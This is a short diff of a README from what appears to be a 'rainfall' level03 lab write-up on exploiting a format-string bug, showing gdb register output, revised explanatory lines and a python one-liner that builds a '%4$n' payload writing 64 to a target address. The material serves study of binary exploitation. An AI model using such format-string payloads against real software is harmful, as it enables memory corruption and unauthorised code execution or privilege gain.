SERAC-SGM/rainfall-42/level03/README.md

     fs             0x0	0
     gs             0x33	51

-Our string was 5 characters long (%4$n is a modifier but is included as well, however it won't count for some reason), and we got a value of 5.
-To have a size of 64, we simply need to add 60 more characters.
+Our string was 5 characters long (%4$n is a modifier but is included as well, however it won't count in the end for some reason), and we got a value of 5.
+To have a size of 64 (without %4$n), we simply need to add 60 more characters.

     $ python -c 'print "\x8c\x98\x04\x08"+"Y"*60+"%4$n"' > payload